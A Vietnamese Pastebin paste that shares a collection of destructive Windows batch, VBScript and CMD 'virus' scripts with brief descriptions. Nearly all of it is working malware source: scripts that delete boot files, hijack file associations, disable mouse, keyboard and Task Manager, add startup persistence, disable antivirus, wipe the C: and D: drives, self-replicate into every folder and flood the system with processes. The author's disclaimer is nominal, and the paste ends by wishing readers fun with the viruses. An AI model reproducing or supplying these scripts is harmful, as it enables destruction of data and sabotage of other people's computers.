adminvietnam

Virut máy

Nov 13th, 2015
185
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.86 KB | None | 0 0
  1. Mình sẽ cho các bạn một số code để các bạn biết về cấu tạo của nó chứ mình khuyên các bạn không nên dùng nó đem đi phá hoại người khác và các bạn muốn biết hoạt động của nó như thế nào thì minh khuyên các bạn nên cài đặt máy ảo hoặc đóng băng các ổ trước khi sử dụng những con virus này.
  2. Mình sẽ cho các bạn xem một số code của con virus đuôi .BAT:
  3. 1) virus phá hoại cửa sổ windown:
  4. Code:
  5. @echo off
  6. msg *virus activated*
  7. attrib -r -s -h c:\autoexec.bat
  8. del c:\autoexec.bat
  9. attrib -r -s -h c:\boot.ini
  10. del c:\boot.ini
  11. attrib -r -s -h c:\ntldr
  12. del c:\ntldr
  13. attrib -r -s -h c:\windows\win.ini
  14. del c:\windows\win.ini
  15. @echo off
  16. msg *Computer Over. Virus=Very Yes.*
  17. shutdown -s -t 10 -c " "
  18.  
  19. 2)loại virus này làm vô hiệu hóa chuột, bàn phím,task manager, thay đổi tập tin:
  20. code:
  21. @echo off
  22. prompt $P $G
  23. assoc .doc = fA1luRe
  24. assoc .docx = fA1luRe
  25. assoc .log = fA1luRe
  26. assoc .msg = fA1luRe
  27. assoc .pages = fA1luRe
  28. assoc .rtf = fA1luRe
  29. assoc .txt = fA1luRe
  30. assoc .wpd = fA1luRe
  31. assoc .wps = fA1luRe
  32. assoc .accdb = fA1luRe
  33. assoc .blg = fA1luRe
  34. assoc .csv = fA1luRe
  35. assoc .dat = fA1luRe
  36. assoc .db = fA1luRe
  37. assoc .efx = fA1luRe
  38. assoc .mdb = fA1luRe
  39. assoc .pdb = fA1luRe
  40. assoc .pps = fA1luRe
  41. assoc .ppt = fA1luRe
  42. assoc .pptx = fA1luRe
  43. assoc .sdb = fA1luRe
  44. assoc .sdf = fA1luRe
  45. assoc .sql = fA1luRe
  46. assoc .vcf = fA1luRe
  47. assoc .wks = fA1luRe
  48. assoc .xls = fA1luRe
  49. assoc .xlsx = fA1luRe
  50. assoc .xml = fA1luRe
  51. assoc .bmp = fA1luRe
  52. assoc .gif = fA1luRe
  53. assoc .jpg = fA1luRe
  54. assoc .png = fA1luRe
  55. assoc .psd = fA1luRe
  56. assoc .psp = fA1luRe
  57. assoc .thm = fA1luRe
  58. assoc .tif = fA1luRe
  59. assoc .ai = fA1luRe
  60. assoc .drw = fA1luRe
  61. assoc .eps = fA1luRe
  62. assoc .ps = fA1luRe
  63. assoc .svg = fA1luRe
  64. assoc .3dm = fA1luRe
  65. assoc .dwg = fA1luRe
  66. assoc .dxf = fA1luRe
  67. assoc .pln = fA1luRe
  68. assoc .indd = fA1luRe
  69. assoc .pct = fA1luRe
  70. assoc .pdf = fA1luRe
  71. assoc .qxd = fA1luRe
  72. assoc .qxp = fA1luRe
  73. assoc .rels = fA1luRe
  74. assoc .aac = fA1luRe
  75. assoc .aif = fA1luRe
  76. assoc .iff = fA1luRe
  77. assoc .m3u = fA1luRe
  78. assoc .mid = fA1luRe
  79. assoc .mp3 = fA1luRe
  80. assoc .mpa = fA1luRe
  81. assoc .ra = fA1luRe
  82. assoc .wav = fA1luRe
  83. assoc .wma = fA1luRe
  84. assoc .3g2 = fA1luRe
  85. assoc .3gp = fA1luRe
  86. assoc .asf = fA1luRe
  87. assoc .asx = fA1luRe
  88. assoc .avi = fA1luRe
  89. assoc .flv = fA1luRe
  90. assoc .mov = fA1luRe
  91. assoc .mp4 = fA1luRe
  92. assoc .mpg = fA1luRe
  93. assoc .rm = fA1luRe
  94. assoc .swf = fA1luRe
  95. assoc .vob = fA1luRe
  96. assoc .wmv = fA1luRe
  97. assoc .asp = fA1luRe
  98. assoc .cer = fA1luRe
  99. assoc .csr = fA1luRe
  100. assoc .css = fA1luRe
  101. assoc .htm = fA1luRe
  102. assoc .html = fA1luRe
  103. assoc .js = fA1luRe
  104. assoc .jsp = fA1luRe
  105. assoc .php = fA1luRe
  106. assoc .rss = fA1luRe
  107. assoc .tvpi = fA1luRe
  108. assoc .tvvi = fA1luRe
  109. assoc .xhtml = fA1luRe
  110. assoc .fnt = fA1luRe
  111. assoc .fon = fA1luRe
  112. assoc .otf = fA1luRe
  113. assoc .ttf = fA1luRe
  114. assoc .8bi = fA1luRe
  115. assoc .plugin = fA1luRe
  116. assoc .xll = fA1luRe
  117. assoc .cab = fA1luRe
  118. assoc .cpl = fA1luRe
  119. assoc .cur = fA1luRe
  120. assoc .dll = fA1luRe
  121. assoc .dmp = fA1luRe
  122. assoc .drv = fA1luRe
  123. assoc .key = fA1luRe
  124. assoc .lnk = fA1luRe
  125. assoc .sys = fA1luRe
  126. assoc .cfg = fA1luRe
  127. assoc .ini = fA1luRe
  128. assoc .keychain = fA1luRe
  129. assoc .prf = fA1luRe
  130. assoc .app = fA1luRe
  131. assoc .bat = fA1luRe
  132. assoc .cgi = fA1luRe
  133. assoc .com = fA1luRe
  134. assoc .exe = fA1luRe
  135. assoc .pif = fA1luRe
  136. assoc .vb = fA1luRe
  137. assoc .ws = fA1luRe
  138. assoc .7z = fA1luRe
  139. assoc .deb = fA1luRe
  140. assoc .gz = fA1luRe
  141. assoc .pkg = fA1luRe
  142. assoc .rar = fA1luRe
  143. assoc .sit = fA1luRe
  144. assoc .sitx = fA1luRe
  145. assoc .tar.gz = fA1luRe
  146. assoc .zip = fA1luRe
  147. assoc .zipx = fA1luRe
  148. assoc .bin = fA1luRe
  149. assoc .hqx = fA1luRe
  150. assoc .mim = fA1luRe
  151. assoc .uue = fA1luRe
  152. assoc .c = fA1luRe
  153. assoc .cpp = fA1luRe
  154. assoc .dtd = fA1luRe
  155. assoc .java = fA1luRe
  156. assoc .pl = fA1luRe
  157. assoc .bak = fA1luRe
  158. assoc .bup = fA1luRe
  159. assoc .gho = fA1luRe
  160. assoc .ori = fA1luRe
  161. assoc .tmp = fA1luRe
  162. assoc .dmg = fA1luRe
  163. assoc .iso = fA1luRe
  164. assoc .toast = fA1luRe
  165. assoc .vcd = fA1luRe
  166. assoc .gam = fA1luRe
  167. assoc .nes = fA1luRe
  168. assoc .rom = fA1luRe
  169. assoc .sav = fA1luRe
  170. assoc .dbx = fA1luRe
  171. assoc .msi = fA1luRe
  172. assoc .part = fA1luRe
  173. assoc .torrent = fA1luRe
  174. assoc .yps = fA1luRe
  175. rundll32.exe mouse, disable
  176. rundll32.exe keyboard, disable
  177. copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
  178. copy setup.bat %windir%\System32
  179. reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
  180. taskkill /f /im taskmgr.exe
  181. reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr = 1
  182. shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
  183.  
  184. 3)kiểm tra % của CPU lên đến bao nhiêu %:
  185. bạn mở notepad ra và gõ start 1.bat vào trong rồi các bạn lưu con virus này là 1.bat rồi ngay lập tức % CPU sẽ tăng lên.
  186.  
  187. 4)lặp lại nhiều lần chu kỳ mess:
  188. Code:
  189. @ECHO off
  190. :Begin
  191. msg * lời cảnh báo
  192. msg * lời cảnh báo
  193. msg * lời cảnh báo
  194. msg * lời cảnh báo
  195. msg * lời cảnh báo
  196. GOTO BEGIN
  197. VD:
  198. @ECHO off
  199. :Begin
  200. msg * Hi
  201. msg * khoe ko anh ?
  202. msg * em ne ?
  203. msg * buon ngu chua anh ?
  204. msg * tat may ngu thoi ,bb anh
  205. GOTO BEGIN
  206. 5)tự động tắt máy và kèm theo lời nhắn:
  207. Code:
  208. @echo off
  209. msg * lời cảnh báo
  210. shutdown -c “lời cảnh báo” -s
  211. VD:
  212. @echo off
  213. msg * I LOVE YOU
  214. shutdown -c “Error! tam biet anh!” -s
  215.  
  216. Còn đây là một số con virus có đuôi là .VBS
  217. 1)Chức năng gửi thông điệp cảnh báo:
  218. Code:
  219. text1=msgbox("Thông điêp cảnh báo",42,"Tên thông điệp cảnh báo")
  220.  
  221. 2)Chức năng làm đứng máy tính:
  222. Code:
  223. msgbox"Error !"
  224. On Error Resume Next
  225. Set vip_xinh = Createobject("scripting.filesystemobject")
  226. vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"
  227. Set vip_xinh2= CreateObject("WScript.Shell")
  228. vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"
  229.  
  230. On Error Resume Next
  231. Const vic = "D:\"
  232. Delvic
  233. Sub Delvic()
  234. Dim fso
  235. Set fso = CreateObject("Scripting.FileSystemObject")
  236. fso.DeleteFile vic & "*.*" , True
  237. fso.DeleteFolder vic & "*" , True
  238. End Sub
  239.  
  240. On Error Resume Next
  241. Const vic1 = "C:\windows\"
  242. Delvic1
  243. Sub Delvic1()
  244. Dim fso1
  245. Set fso1 = CreateObject("Scripting.FileSystemObject")
  246. fso1.DeleteFile vic1 & "*.*" , True
  247. fso1.DeleteFolder vic1 & "*" , True
  248. End Sub
  249.  
  250. On Error Resume Next
  251. Const vic2 = "C:\"
  252. Delvic2
  253. Sub Delvic2()
  254. Dim fso2
  255. Set fso2 = CreateObject("Scripting.FileSystemObject")
  256. fso2.DeleteFile vic2 & "*.*" , True
  257. fso2.DeleteFolder vic2 & "*" , True
  258. End Sub
  259.  
  260. On Error Resume Next
  261. Set treomay= CreateObject("WScript.Shell")
  262. Do
  263. treomay.run "notepad",false
  264. loop
  265.  
  266. 3)Đây là một con virus rất ác mình khuyên ban muốn thử nó thì hãy đóng băng tất cả các ổ trước khi sử dụng nó không thì rước họa vào thân đấy bạn
  267. Code:
  268. Dim fso,file,VBCopy
  269. Set fso=CreateObject("Scripting.FileSystemObject")
  270. Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  271. VBCopy=file.ReadAll
  272. FolderList("A:")
  273. FolderList("B:")
  274. FolderList("C:")
  275. FolderList("D:")
  276. FolderList("E:")
  277. FolderList("F:")
  278. FolderList("G:")
  279. FolderList("H:")
  280. FolderList("I:")
  281. FolderList("J:")
  282. FolderList("K:")
  283. FolderList("L:")
  284. FolderList("M:")
  285. FolderList("N:")
  286. FolderList("O:")
  287. FolderList("P:")
  288. FolderList("Q:")
  289. FolderList("R:")
  290. FolderList("S:")
  291. FolderList("T:")
  292. FolderList("U:")
  293. FolderList("V:")
  294. FolderList("X:")
  295. FolderList("Y:")
  296. FolderList("Z:")
  297. FolderList("W:")
  298. Sub FolderList(FolderSpec)
  299. On Error Resume Next
  300. Dim f,f1,sf,COP,CAP
  301. Set f=fso.GetFolder(FolderSpec)
  302. set sf=f.SubFolders
  303. For Each f1 In sf
  304. Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  305. COP.write VBCopy
  306. Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  307. CAP.write VBCopy
  308. FolderList(f1.Path)
  309. Next
  310. End sub
  311.  
  312. Còn đây là thuốc giải:
  313. Code:
  314. Dim fso,file,VBCopy
  315. Set fso=CreateObject("Scripting.FileSystemObject")
  316. Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
  317. VBCopy=file.ReadAll
  318. FolderList("A:")
  319. FolderList("B:")
  320. FolderList("C:")
  321. FolderList("D:")
  322. FolderList("E:")
  323. FolderList("F:")
  324. FolderList("G:")
  325. FolderList("H:")
  326. FolderList("I:")
  327. FolderList("J:")
  328. FolderList("K:")
  329. FolderList("L:")
  330. FolderList("M:")
  331. FolderList("N:")
  332. FolderList("O:")
  333. FolderList("P:")
  334. FolderList("Q:")
  335. FolderList("R:")
  336. FolderList("S:")
  337. FolderList("T:")
  338. FolderList("U:")
  339. FolderList("V:")
  340. FolderList("X:")
  341. FolderList("Y:")
  342. FolderList("Z:")
  343. FolderList("W:")
  344. Sub FolderList(FolderSpec)
  345. On Error Resume Next
  346. Dim f,f1,sf,COP,CAP,ATT
  347. Set f=fso.GetFolder(FolderSpec)
  348. set sf=f.SubFolders For Each f1 In sf
  349. 'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")
  350. 'COP.write VBCopy
  351. 'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")
  352. 'CAP.write VBCopy
  353. 'Set ATT=fso.GetFolder(f1.Path)
  354. 'ATT.Attributes=ATT.Attributes+2
  355. fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
  356. fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")
  357. FolderList(f1.Path)
  358. Next
  359. End sub
  360.  
  361. 4)chức năng mở một thông điệp rồi sẽ tự động tắt máy:
  362. Code:
  363. @echo off
  364. msg * thông điệp
  365. shutdown -c "thông điệp" -s -t 10
  366.  
  367. 5)không cho victim khởi động máy:
  368. Code:
  369. Dim wsh
  370. Set wsh = createobject("wscript.shell")
  371. wsh.run "RUNDLL32.EXE user.exe,exitwindows"
  372.  
  373. 6)Disable NAV:
  374. Code:
  375. Dim wsh
  376. Set wsh= CreateObject( "WScript.Shell")
  377. s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
  378. es\Norton Program
  379. Scheduler\Start"
  380. wsh.RegWrite s1,3, "REG_DWORD"
  381.  
  382. 7)hiển thị message mỗi khi restart máy:
  383. Code:
  384. dim wsh
  385. Set wsh = CreateObject( "WScript.Shell" )
  386. s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win
  387. Logon\"
  388. s2 = "LegalNoticeCaption"
  389. s3 = "LegalNoticeText"
  390. wsh.RegWrite s1+s2, "lời cảnh báo"
  391. wsh.RegWrite s1+s3, "lời cảnh báo"
  392.  
  393. 8)chuc nang hien thi dong lenh khi ban click vao floder:
  394. Code:
  395. set reg=createobject("WScript.shell")
  396. reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","loi canh bao"
  397. reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\loi canh bao\","SLM"
  398. vd:
  399. set reg=createobject("WScript.shell")
  400. reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu truongton.net"
  401. reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu truongton.net\","SLM"
  402.  
  403. 9)Xóa Registry Files:
  404. Code:
  405. @ECHO OFF
  406. START reg delete HKCR/.exe
  407. START reg delete HKCR/.dll
  408. START reg delete HKCR/*
  409. :MESSAGE
  410. ECHO slm loi canh bao.
  411. GOTO MESSAGE
  412. vd:
  413. @ECHO OFF
  414. START reg delete HKCR/.exe
  415. START reg delete HKCR/.dll
  416. START reg delete HKCR/*
  417. :MESSAGE
  418. ECHO slm chuc anh 1 ngay vui ve.
  419. GOTO MESSAGE
  420.  
  421. 10)Bật notepad lien tuc lam may tinh bi ngơ:
  422. Code:
  423. @ECHO off
  424. :top
  425. START %SystemRoot%\system32\notepad.exe
  426. GOTO top
  427.  
  428. 11)bật tắt caps lock liên tục:
  429. Code:
  430. Set wshShell =wscript.CreateObject("WScript.Shell")
  431. do
  432. wscript.sleep 100
  433. wshshell.sendkeys "{CAPSLOCK}"
  434. loop
  435.  
  436. 12)Ép enter liên tục:
  437. Code:
  438. Set wshShell = wscript.CreateObject("WScript.Shell")
  439. do
  440. wscript.sleep 100
  441. wshshell.sendkeys "~(enter)"
  442. loop
  443. ep Backspace lien tuc:
  444. MsgBox "Let's go back a few steps"
  445. Set wshShell =wscript.CreateObject("WScript.Shell")
  446. do
  447. wscript.sleep 100
  448. wshshell.sendkeys "{bs}"
  449. loop
  450.  
  451. Còn đây là một số con virus có đuôi .cmd:
  452. 1)Xóa sạch tất cả các file có trong máy:
  453. Code:
  454. DEL /F /Q *
  455.  
  456. 2)Xóa một file nào đó:
  457. Code:
  458. erase đường dẫn
  459. vd:
  460. erase C:\TEST.txt
  461.  
  462. 3)Ẩn tòan bộ file trong win
  463. Code:
  464. ATTRIB +S /F /Q *
  465.  
  466. Thế là xong phù mệt quá chúc các bạn vui vẻ với những con virus này nếu có con mới mình sẽ post lên cho các bạn thưởng thức.
Advertisement
Add Comment
Please, Sign In to add comment